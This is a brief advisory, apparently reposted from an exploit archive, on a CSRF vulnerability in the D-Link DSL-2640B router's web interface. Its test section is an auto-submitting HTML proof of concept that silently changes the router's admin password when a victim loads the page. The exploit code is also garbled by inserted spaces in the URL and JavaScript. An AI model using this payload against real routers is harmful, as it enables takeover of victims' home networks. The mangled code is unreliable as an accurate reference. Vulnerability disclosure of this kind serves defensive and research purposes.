Title: D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
Author: Ivano Binetti www.2cto.com (http://ivanobinetti.com)
Web site: http://www.d-link.com
Affected Version: DSL-2640B
Test Platform: Firmware Version: EU_4.00; Hardware Version: B2
+ -----------------------------------------------
[Change Admin Account Password by Ivano Binetti] -------- +
Summary
1) Overview
2) defect description
3) test
+ ---------------------------------------------------------------------- +
1) Overview
D-Link DSL-2640B is an ADSL Router using (also) a web management interface.
2) Vulnerability Description
The D-Link DSL-2640B's web interface (listening on TCP/IP port 80) is prone to CSRF vulnerabilities which allows to change router
Parameters and-among other things-to change default administrator ("admin") password.
3) test
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change ADMIN password </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.1.1: 80/redpass. cgi? SysPassword = new_password & change = 1 ">
</Form>
</Body>
</Html>